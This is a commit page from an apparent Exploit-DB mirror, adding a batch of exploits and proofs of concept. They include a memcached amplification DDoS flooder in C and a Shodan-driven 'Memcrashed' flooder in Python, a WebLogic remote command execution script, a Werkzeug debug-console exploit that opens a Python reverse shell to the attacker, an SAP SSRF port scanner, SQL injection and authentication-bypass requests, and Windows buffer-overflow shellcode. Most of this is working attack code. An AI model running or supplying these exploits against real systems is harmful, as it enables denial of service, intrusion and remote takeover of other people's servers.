bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-03-10

Browse source 
15 changes to exploits/shellcodes

uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service
μTorrent (uTorrent) / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service

uTorrent 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC)
μTorrent (uTorrent) 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC)

uTorrent WebUI 0.370 - Authorisation Header Denial of Service
μTorrent (uTorrent) WebUI 0.370 - Authorisation Header Denial of Service

Memcached - 'memcrashed' Denial of Service
Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (2)
Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (1)
Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API
Broadcom BCM43xx Wi-Fi  - 'BroadPWN' Denial of Service
WebLog Expert Enterprise 9.4 - Denial of Service

uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking
μTorrent (uTorrent) 2.0.3 - 'plugin_dll.dll' DLL Hijacking

uTorrent 2.0.3 - DLL Hijacking
μTorrent (uTorrent) 2.0.3 - DLL Hijacking

iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow
Microsoft Office - 'Composite Moniker Remote Code Execution
Mozilla Firefox - Address Bar Spoofing
Tor (Firefox 41 < 50) - Code Execution
Chrome 35.0.1916.153 - Sandbox Escape / Command Execution
WebLog Expert Enterprise 9.4 - Authentication Bypass

uTorrent 1.6 build 474 - 'announce' Key Remote Heap Overflow
μTorrent (uTorrent) 1.6 build 474 - 'announce' Key Remote Heap Overflow

t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal
T. Hauck Jana Server 1.0/1.45/1.46 - Directory Traversal

Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution

Werkzeug - 'Debug Shell' Command Execution

TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal
TikiWiki Project < 1.9.9 - 'tiki-listmovies.php' Directory Traversal

toronja CMS - SQL Injection
Toronja CMS - SQL Injection

uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery
μTorrent (uTorrent) WebUI 0.310 Beta 2 - Cross-Site Request Forgery
tinybrowser - 'tinybrowser.php' Directory Listing
tinybrowser - 'edit.php' Directory Listing
TinyBrowser - 'tinybrowser.php' Directory Listing
TinyBrowser - 'edit.php' Directory Listing

Xoops 2.5.7.2 - Directory Traversal Bypass
XOOPS 2.5.7.2 - Directory Traversal Bypass

SAP BusinessObjects launch pad - Server-Side Request Forgery

antMan < 0.9.1a - Authentication Bypass

Bacula-Web < 8.0.0-rc2 - SQL Injection
This commit is contained in:
Offensive Security 2018-03-10 05:01:50 +00:00
parent a2480f5b98
commit 5947825a84
16 changed files with 1022 additions and 14 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
exploits/android/dos/44268.txt Normal file
View file

@ -0,0 +1,3 @@
This Exploit allows arbitrary memory writes and reads. Running the specified payload within this package will write to the device's main CPU kernel, causing it to crash. More information about its origins here: http://boosterok.com/blog/broadpwn2/
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44268.zip

228
exploits/linux/dos/44264.c Normal file
View file

@ -0,0 +1,228 @@
/**
memcached-PoC
memcached Proof of Concept Amplification via spoofed source UDP packets. Repo includes source code for PoC and approximately 17,000 AMP hosts.
memcached.c - Source code (https://pastebin.com/raw/ZiUeinae)
memecache-amp-03-05-2018-rd.list - List of memcached servers as of 03-05-2018 (https://pastebin.com/raw/eSCHTTVu)
Compile: gcc memcached.c -o memecached -pthread
*Educational and/or testing purposes only. *Use of these tools against an unauthorized party may be unethtical, rude, and even illegal in some countries.
**/
/*
memcache reflection script
greeting: syn, storm, krashed, chrono, spike, niko, disliked
Use with extreme Caution
*/
#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 8192
#define PHI 0x9e3779b9
static uint32_t Q[4096], c = 362436;
struct list
{
struct sockaddr_in data;
struct list *next;
struct list *prev;
};
struct list *head;
volatile int tehport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
void init_rand(uint32_t x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++)
{
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
}
}
uint32_t rand_cmwc(void)
{
uint64_t t, a = 18782LL;
static uint32_t i = 4095;
uint32_t x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int nwords)
{
unsigned long sum = 0;
for (sum = 0; nwords > 0; nwords--)
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (unsigned short)(~sum);
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 15;
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = IPPROTO_UDP;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_udp_header(struct udphdr *udph)
{
udph->source = htons(5678);
udph->dest = htons(11211);
udph->check = 0;
memcpy((void *)udph + sizeof(struct udphdr), "\x00\x01\x00\x00\x00\x01\x00\x00stats\r\n", 15);
udph->len=htons(sizeof(struct udphdr) + 15);
}
void *flood(void *par1)
{
struct thread_data *td = (struct thread_data *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin = td->sin;
struct list *list_node = td->list_node;
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
init_rand(time(NULL));
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_udp_header(udph);
udph->source = htons(rand() % 65535 - 1026);
iph->saddr = sin.sin_addr.s_addr;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
list_node = list_node->next;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 6){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target IP> <port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
srand(time(NULL));
int i = 0;
head = NULL;
fprintf(stdout, "Setting up sockets...\n");
int max_len = 128;
char *buffer = (char *) malloc(max_len);
buffer = memset(buffer, 0x00, max_len);
int num_threads = atoi(argv[4]);
int maxpps = atoi(argv[5]);
limiter = 0;
pps = 0;
int multiplier = 20;
FILE *list_fd = fopen(argv[3], "r");
while (fgets(buffer, max_len, list_fd) != NULL) {
if ((buffer[strlen(buffer) - 1] == '\n') ||
(buffer[strlen(buffer) - 1] == '\r')) {
buffer[strlen(buffer) - 1] = 0x00;
if(head == NULL)
{
head = (struct list *)malloc(sizeof(struct list));
bzero(&head->data, sizeof(head->data));
head->data.sin_addr.s_addr=inet_addr(buffer);
head->next = head;
head->prev = head;
} else {
struct list *new_node = (struct list *)malloc(sizeof(struct list));
memset(new_node, 0x00, sizeof(struct list));
new_node->data.sin_addr.s_addr=inet_addr(buffer);
new_node->prev = head;
new_node->next = head->next;
head->next = new_node;
}
i++;
} else {
continue;
}
}
struct list *current = head->next;
pthread_t thread[num_threads];
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
struct thread_data td[num_threads];
for(i = 0;i<num_threads;i++){
td[i].thread_id = i;
td[i].sin= sin;
td[i].list_node = current;
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
}
fprintf(stdout, "Starting flood...\n");
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}

170
exploits/linux/dos/44265.py Executable file
View file

@ -0,0 +1,170 @@
#-- coding: utf8 --
#!/usr/bin/python
# Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44265.zip
import sys, os, time, shodan
from pathlib import Path
from scapy.all import *
from contextlib import contextmanager
starttime=time.time()
@contextmanager
def suppress_stdout():
with open(os.devnull, "w") as devnull:
old_stdout = sys.stdout
sys.stdout = devnull
try:
yield
finally:
sys.stdout = old_stdout
class color:
HEADER = '\033[0m'
keys = Path("./api.txt")
logo = color.HEADER + '''
Author: @037
Version: 3.1
####################################### DISCLAIMER ########################################
| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable |
| memcached servers. It then allows you to use the same servers to launch widespread |
| distributed denial of service attacks by forging UDP packets sourced to your victim. |
| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |
| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. |
| I am NOT responsible for any damages caused or any crimes committed by using this tool. |
###########################################################################################
'''
print(logo)
if keys.is_file():
with open('api.txt', 'r') as file:
SHODAN_API_KEY=file.readlines()
else:
file = open('api.txt', 'w')
SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ')
file.write(SHODAN_API_KEY)
print('[~] File written: ./api.txt')
file.close()
while True:
api = shodan.Shodan(SHODAN_API_KEY)
print('')
try:
myresults = Path("./bots.txt")
query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower()
if query.startswith('y'):
print('')
print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)
results = api.search('product:"Memcached" port:11211')
print('[✓] API Key Authentication: SUCCESS')
print('[~] Number of bots: %s' % results['total'])
print('')
saveresult = input("[*] Save results for later usage? <Y/n>: ").lower()
if saveresult.startswith('y'):
file2 = open('bots.txt', 'a')
for result in results['matches']:
file2.write(result['ip_str'] + "\n")
print('[~] File written: ./bots.txt')
print('')
file2.close()
saveme = input('[*] Would you like to use locally stored Shodan data? <Y/n>: ').lower()
if myresults.is_file():
if saveme.startswith('y'):
ip_arrayn = []
with open('bots.txt') as my_file:
for line in my_file:
ip_arrayn.append(line)
ip_array = [s.rstrip() for s in ip_arrayn]
else:
print('')
print('[✘] Error: No bots stored locally, bots.txt file not found!')
print('')
if saveme.startswith('y') or query.startswith('y'):
print('')
target = input("[▸] Enter target IP address: ")
power = int(input("[▸] Enter preferred power (Default 1): ") or "1")
data = input("[▸] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
print('')
if query.startswith('y'):
iplist = input('[*] Would you like to display all the bots from Shodan? <Y/n>: ').lower()
if iplist.startswith('y'):
print('')
counter= int(0)
for result in results['matches']:
host = api.host('%s' % result['ip_str'])
counter=counter+1
print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a')))
time.sleep(2.0 - ((time.time() - starttime) % 2.0))
if saveme.startswith('y'):
iplistlocal = input('[*] Would you like to display all the bots stored locally? <Y/n>: ').lower()
if iplistlocal.startswith('y'):
print('')
counter= int(0)
for x in ip_array:
host = api.host('%s' % x)
counter=counter+1
print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a')))
time.sleep(2.0 - ((time.time() - starttime) % 2.0))
print('')
engage = input('[*] Ready to engage target %s? <Y/n>: ' % target).lower()
if engage.startswith('y'):
if saveme.startswith('y'):
for i in ip_array:
if power>1:
print('[+] Sending %d forged UDP packets to: %s' % (power, i))
with suppress_stdout():
send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
elif power==1:
print('[+] Sending 1 forged UDP packet to: %s' % i)
with suppress_stdout():
send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
else:
for result in results['matches']:
if power>1:
print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))
with suppress_stdout():
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power)
elif power==1:
print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str'])
with suppress_stdout():
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power)
print('')
print('[•] Task complete! Exiting Platform. Have a wonderful day.')
break
else:
print('')
print('[✘] Error: %s not engaged!' % target)
print('[~] Restarting Platform! Please wait.')
print('')
else:
print('')
print('[✘] Error: No bots stored locally or remotely on Shodan!')
print('[~] Restarting Platform! Please wait.')
print('')
except shodan.APIError as e:
print('[✘] Error: %s' % e)
option = input('[*] Would you like to change API Key? <Y/n>: ').lower()
if option.startswith('y'):
file = open('api.txt', 'w')
SHODAN_API_KEY = input('[*] Please enter valid Shodan.io API Key: ')
file.write(SHODAN_API_KEY)
print('[~] File written: ./api.txt')
file.close()
print('[~] Restarting Platform! Please wait.')
print('')
else:
print('')
print('[•] Exiting Platform. Have a wonderful day.')
break

3
exploits/multiple/local/44266.html Normal file
View file

@ -0,0 +1,3 @@
<script>
location=URL.createObjectURL(new Blob(['<b>Not Google</b><script>if(location.href.indexOf("google")==-1){location.pathname="https://www.google.com/"}else{document.title="Google Search"}<\/script>'], {type: 'text/html'}))
</script>

61
exploits/multiple/remote/43392.py Executable file
View file

@ -0,0 +1,61 @@
import requests
import sys
url_in = sys.argv[1]
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
payload_header = {'content-type': 'text/xml'}
def payload_command (command_in):
html_escape_table = {
"&": "&",
'"': """,
"'": "&apos;",
">": ">",
"<": "<",
}
command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
" <soapenv:Header> " \
" <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
" <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
" <void class=\"java.lang.ProcessBuilder\"> \n" \
" <array class=\"java.lang.String\" length=\"3\">" \
" <void index = \"0\"> " \
" <string>cmd</string> " \
" </void> " \
" <void index = \"1\"> " \
" <string>/c</string> " \
" </void> " \
" <void index = \"2\"> " \
+ command_filtered + \
" </void> " \
" </array>" \
" <void method=\"start\"/>" \
" </void>" \
" </java>" \
" </work:WorkContext>" \
" </soapenv:Header>" \
" <soapenv:Body/>" \
"</soapenv:Envelope>"
return payload_1
def do_post(command_in):
result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
if result.status_code == 500:
print "Command Executed \n"
else:
print "Something Went Wrong \n"
print "***************************************************** \n" \
"**************** Coded By 1337g ****************** \n" \
"* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \
"***************************************************** \n"
while 1:
command_in = raw_input("Eneter your command here: ")
if command_in == "exit" : exit(0)
do_post(command_in)

55
exploits/multiple/remote/43905.py Executable file
View file

@ -0,0 +1,55 @@
#!/usr/bin/env python
import requests
import sys
import re
import urllib
# usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422
if len(sys.argv) != 5:
print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0])
sys.exit(-1)
response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2]))
if "Werkzeug " not in response.text:
print "[-] Debug is not enabled"
sys.exit(-1)
# since the application or debugger about python using python for reverse connect
cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''' % (sys.argv[3],sys.argv[4])
__debugger__ = 'yes'
frm = '0'
response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2]))
secret = re.findall("[0-9a-zA-Z]{20}",response.text)
if len(secret) != 1:
print "[-] Impossible to get SECRET"
sys.exit(-1)
else:
secret = secret[0]
print "[+] SECRET is: "+str(secret)
# shell
print "[+] Sending reverse shell to %s:%s, please use netcat listening in %s:%s" % (sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])
raw_input("PRESS ENTER TO EXPLOIT")
data = {
'__debugger__' : __debugger__,
'cmd' : str(cmd),
'frm' : frm,
's' : secret
}
response = requests.get("http://%s:%s/console" % (sys.argv[1],sys.argv[2]), params=data,headers=response.headers)
print "[+] response from server"
print "status code: " + str(response.status_code)
print "response: "+ str(response.text)

99
exploits/multiple/webapps/43404.py Executable file
View file

@ -0,0 +1,99 @@
# Exploit Title: SAP BusinessObjects launch pad SSRF
# Date: 2017-11-8
# Exploit Author: Ahmad Mahfouz
# Category: Webapps
# Author Homepage: www.unixawy.com
# Description: Design Error in SAP BusinessObjects launch pad leads to SSRF attack
#!/usr/bin/env python
# SAP BusinessObjects launch pad SSRF Timing Attack Port scan
# usage : sblpta.py http://path.faces targetIP targetPort
import urllib2
import urllib
import ssl
from datetime import datetime
import sys
if len(sys.argv) != 4:
   print "Usage: python sblpta.py http://path.faces targetIP targetPort"
   sys.exit(1)
url = sys.argv[1]
targetIP = sys.argv[2]
targetPort = sys.argv[3]
targetHostIP = "%s:%s" %(targetIP,targetPort)
print "\r\n"
print "[*] SAP BusinessObjects Timing Attack"
headers = {'User-Agent': 'Mozilla/5.0'}
gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
try:
   request = urllib2.Request(url, headers=headers)
   page = urllib2.urlopen(request, context=gcontext)
   print "[*] Connected to SAP Bussiness Object %s"  %url
except:
   print "[-] Failed To connect to SAP Bussiness Object %s" %url
   print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
   sys.exit(2)
resheaders = page.info()
cookie = resheaders.dict['set-cookie']
content = page.readlines()
for line in content:
   if "com.sun.faces.VIEW" in line:
      sfview = line.split("=")[4].split("\"")[1]
      print "[*] Got java faces dynamic value"
   else:
      continue
if not sfview:
   print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
   sys.exit(3)
formdata = {"_id0:logon:CMS":targetHostIP,
         "_id0:logon:USERNAME":"",
         "_id0:logon:PASSWORD":"",
         "com.sun.faces.VIEW":sfview,
         "_id0":"_id0"
         }
data_encode = urllib.urlencode(formdata)
start =  datetime.now()
print "[*] Testing Timing Attack %s" %start       
request = urllib2.Request(url,data_encode)
request.add_header('Cookie', cookie)
response  = urllib2.urlopen(request)
end = datetime.now()
the_page = response.read()
if "FWM" in the_page:
   elapsedTime = end-start
   if elapsedTime.total_seconds() >= 10:
      print "[*] Port %s is Open, Gotcha !!! " %targetPort
   else:
      print "[*] Port %s is Closed , we die fast"  %targetPort
elif "FWC" in the_page:
   print "[-] error login expired"
   sys.exit(10)

39
exploits/multiple/webapps/44220.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: antMan <= 0.9.0c Authentication Bypass
# Date: 02-27-2018
# Software Link: https://www.antsle.com
# Version: <= 0.9.0c
# Tested on: 0.9.0c
# Exploit Author: Joshua Bowser
# Contact: joshua.bowser@codecatoctin.com
# Website: http://www.codecatoctin.com
# Category: web apps
1. Description
antMan versions <= 0.9.c contain a critical authentication defect, allowing an unauthenticated attacker to obtain root permissions within the antMan web management console.
http://blog.codecatoctin.com/2018/02/antman-authentication-bypass.html
2. Proof of Concept
The antMan authentication implementation obtains user-supplied username and password parameters from a POST request issued to /login. Next, antMan utilizes Javas ProcessBuilder class to invoke, as root, a bash script called antsle-auth.
This script contains two critical defects that allow an attacker to bypass the authentication checks. By changing the username to > and the password to a url-encoded linefeed (%0a), we can force the authentication script to produce return values not anticipated by the developer.
To exploit these defects, use a web proxy to intercept the login attempt and modify the POST parameters as follows:
#-------------------------
POST /login HTTP/1.1
Host: 10.1.1.7:3000
[snip]
username= > &password=%0a
#-------------------------
You will now be successfully authenticated to antMan as the administrative root user.
3. Solution:
Update to version 0.9.1a

55
exploits/php/webapps/44272.txt Normal file
View file

@ -0,0 +1,55 @@
# Exploit Title: Multiple SQL injection vulnerabilities in Bacula-Web
# Date: 2018-03-07
# Software Link: http://bacula-web.org/
# Exploit Author: Gustavo Sorondo
# Contact: http://twitter.com/iampuky
# Website: http://cintainfinita.com/
# CVE: CVE-2017-15367
# Category: webapps
1. Description
Bacula-web before 8.0.0-rc2 is affected by multiple SQL Injection
vulnerabilities that could allow an attacker to access the Bacula database
and, depending on configuration, escalate privileges on the server.
2. Proofs of Concept
2.1) The /jobs.php script is affected by a SQL Injection vulnerability.
The following GET request can be used to extract the result of "select
@@version" query.
Request:
GET
/jobs.php?status=0&level_id=&client_id=0&start_time=&end_time=&orderby=jobid&jobs_per_page=25&pool_id=11%27%20UNION%20ALL%20SELECT%20@@version%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23
HTTP/1.1
Response:
HTTP/1.1 200 OK
[...]
<td>5.7.19-0ubuntu0.16.04.1</td>
<td class="text-left">
backupjob-report.php?backupjob_name=
[...]
Other parameters (eg. client_id) are also vulnerable, since there is no
protection against SQL Injections at all.
2.2) The /backupjob-report.php script is affected by a SQL Injection
vulnerability.
The following GET request can be used to extract the result of "select
@@version" query.
Request:
GET
/client-report.php?period=7&client_id=21%20UNION%20ALL%20SELECT%20NULL,@@version%23
2.3) The /client-report.php is affected by a SQL Injection vulnerability in
the "client_id" parameter.
3. Solution:
Update to version 8.0.0-RC2
http://bacula-web.org/news-reader/bacula-web-8-0-0-rc2-released.html

92
exploits/windows/dos/44271.py Executable file
View file

@ -0,0 +1,92 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security
Vendor:
=======
www.weblogexpert.com
Product:
=========
WebLog Expert Web Server Enterprise v9.4
WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors:
activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers,
operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts.
Vulnerability Type:
===================
Denial Of Service
CVE Reference:
==============
CVE-2018-7582
Security Issue:
================
WebLog Expert Web Server Enterprise 9.4 allows Remote Denial Of Service (daemon crash) via a long HTTP Accept Header to TCP port 9991.
(e7c.1750): CLR exception - code e0434352 (first/second chance not available)
eax=00000000 ebx=06d1d098 ecx=00000005 edx=00000000 esi=00000002 edi=00000000
eip=778d016d esp=06d1d048 ebp=06d1d0e4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!NtWaitForMultipleObjects+0x15:
778d016d 83c404 add esp,4
Exploit/POC:
=============
import socket
print 'Weblog Expert Server / Denial Of Service'
print 'hyp3rlinx'
IP='Weblog Expert Server IP'
PORT=9991
PAYLOAD="GET /index.html HTTP/1.0 Host: +'IP'+':9991 User-Agent: Mozilla Accept: */*" + "A"*2000+'\r\n\r\n'
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))
s.send(PAYLOAD)
s.close()
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: February 3, 2018
Second attempt : February 17, 2018
March 7, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

51
exploits/windows/local/44224.py Executable file
View file

@ -0,0 +1,51 @@
author = '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title:iSumsoft Local Buffer Overflow Vuln. 0day(SEH)
# Date: 2018.03.02
# Exploit Author: Greg Priest
# Version: iSumsoft ZIP Password Refixer Version 3.1.1
# Tested on: Windows7 x64 HUN/ENG Professional
'''
junk = "A" * 340
nSEH = "\xeb\x06\x90\x90"
SEH = "\x0C\x70\x8D\x73"
nop = "\x90" *16
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" + #cmd.exe shellcode!
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")
crash = junk + nSEH + SEH + nop + shellcode + "C" * 300
exploit = open('iSumsoft-exploit.txt', 'w')
exploit.write(crash)
exploit.close()
print author
print '''
#####################
#This is a PoC code!#
#####################
'''
print "[+] iSumsoft-exploit.txt ready!"
print '[+] Copy iSumsoft-exploit.txt string and paste "start from:" field!'

31
exploits/windows/local/44263.md Normal file
View file

@ -0,0 +1,31 @@
## What?
This repo contains a Proof of Concept exploit for CVE-2017-8570, a.k.a the "Composite Moniker" vulnerability. This demonstrates using the Packager.dll trick to drop an sct file into the %TEMP% directory, and then execute it using the primitive that the vulnerability provides.
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44263.zip
## Why?
A few reasons.
1. I wanted to see if it was possible to use the [Packager.dll file-dropping trick](https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/) to exploit this vulnerability.
2. As far as I'm aware, all other public exploits for CVE-2017-8570 are actually exploiting the "Script Moniker" variant of CVE-2017-0199 and are not actually composite moniker exploits.
3. Raise awareness of exploitation techniques used in the wild, and help defenders to detect exploitation attempts.
## How to run
Simply run the script, providing an Sct file to execute, and an output name for your RTF file:
python packager_composite_moniker.py -s calc.sct -o example.rtf
[+] RTF file written to: example.rtf
## Detection
I have included a Yara rule to detect attempts to exploit this vulnerability via RTF.
## References
- https://justhaifei1.blogspot.co.uk/2017/07/bypassing-microsofts-cve-2017-0199-patch.html
- https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570

12
exploits/windows/local/44267.md Normal file
View file

@ -0,0 +1,12 @@
# TOR Browser 0day : JavaScript Exploit !
## Works on Firefox versions 41 - 50
### The critical vulnerability is believed to affect multiple Windows versions of the open source Firefox web browser as far back as Firefox version 41, and up to Firefox version 50. When exploit opened by a Firefox or Tor Browser with Javascript enabled on a Windows computer, it leverage a memory corruption vulnerability in the background to make direct calls to kernel32.dll, which allows malicious code to be executed on computers running Windows.
<i>Makes redirect to '/member.php' after code execution</i>
- - -
This is an Javascript exploit actively used against TorBrowser NOW. It consists of one HTML and one CSS file, both pasted below and also de-obscured. The exact functionality is unknown but it's getting access to "VirtualAlloc" in "kernel32.dll" and goes from there. Please fix ASAP. I had to break the "thecode" line in two in order to post, remove ' + ' in the middle to restore it. - SIGAINT
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44267.zip

3
exploits/windows/local/44269.txt Normal file
View file

@ -0,0 +1,3 @@
Sandbox escape Chrome exploit. Allows the execution of local binaries, read/write functions and exfiltration of Chrome OAuth tokens to remote server. More info: https://bugs.chromium.org/p/chromium/issues/detail?id=386988
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44269.zip

91
exploits/windows/local/44270.txt Normal file
View file

@ -0,0 +1,91 @@
